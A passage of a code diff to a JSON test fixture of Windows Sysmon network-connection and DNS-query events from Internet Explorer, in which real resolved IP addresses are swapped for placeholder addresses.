SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e23\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.218\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e23\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.218\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3" } }, @@ -4755,7 +4755,7 @@ { "@timestamp": "2021-05-05T15:30:51.704Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692791400Z'/\u003e\u003cEventRecordID\u003e140\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692791400Z'/\u003e\u003cEventRecordID\u003e140\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edsum.casalemedia.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -4772,7 +4772,7 @@ "time_created": "2019-07-18T03:34:04.692Z", "level": "information", "event_data": { - "QueryResults": "type: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:23.52.162.21;", + "QueryResults": "type: 5 dsum.casalemedia.com.edgekey.net;type: 5 e8037.g.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.169", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -4810,7 +4810,7 @@ "ProcessId": "2736", "QueryName": "sync.mathtag.com", "QueryStatus": "0", - "QueryResults": "type: 5 pixel-origin.mathtag.com;::ffff:216.200.232.235;::ffff:216.200.232.201;::ffff:74.121.138.26;::ffff:216.200.232.185;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;" + "QueryResults": "type: 5 pixel-origin.mathtag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;" }, "record_id": 141, "event_id": "22", @@ -4830,7 +4830,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692803100Z'/\u003e\u003cEventRecordID\u003e141\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.mathtag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-origin.mathtag.com;::ffff:216.200.232.235;::ffff:216.200.232.201;::ffff:74.121.138.26;::ffff:216.200.232.185;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692803100Z'/\u003e\u003cEventRecordID\u003e141\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.169\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.mathtag.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pixel-origin.mathtag.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -4851,7 +4851,7 @@ "ProcessId": "2736", "QueryName": "status.rapidssl.com", "QueryStatus": "0", - "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;", + "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.184", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -4875,7 +4875,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692814000Z'/\u003e\u003cEventRecordID\u003e142\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.rapidssl.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692814000Z'/\u003e\u003cEventRecordID\u003e142\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.rapidssl.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { @@ -4892,7 +4892,7 @@ "time_created": "2019-07-18T03:34:04.692Z", "level": "information", "event_data": { - "QueryResults": "type: 5 cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:34.197.195.131;::ffff:34.192.39.82;::ffff:34.199.231.204;::ffff:34.199.113.81;::ffff:34.197.3.157;::ffff:34.205.112.156;::ffff:34.195.29.8;::ffff:34.201.247.123;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;", + "QueryResults": "type: 5 cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.184", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -4915,7 +4915,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692826300Z'/\u003e\u003cEventRecordID\u003e143\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.extend.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:34.197.195.131;::ffff:34.192.39.82;::ffff:34.199.231.204;::ffff:34.199.113.81;::ffff:34.197.3.157;::ffff:34.205.112.156;::ffff:34.195.29.8;::ffff:34.201.247.123;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692826300Z'/\u003e\u003cEventRecordID\u003e143\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.184\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.extend.tv\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cookiesyncing-1395500543.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } @@ -4940,7 +4940,7 @@ "ProcessId": "2736", "QueryName": "ocsp.comodoca.com", "QueryStatus": "0", - "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -4956,7 +4956,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692837600Z'/\u003e\u003cEventRecordID\u003e144\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.185\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:151.139.128.14;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692837600Z'/\u003e\u003cEventRecordID\u003e144\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.185\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.comodoca.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 t3j2g9x7.stackpathcdn.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -4968,7 +4968,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692848900Z'/\u003e\u003cEventRecordID\u003e145\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.189\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync-tm.everesttech.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sync.tubemogul.com;type: 5 syncf.tubemogul.com;type: 5 h2.shared.global.fastly.net;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;::ffff:151.101.194.49;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated 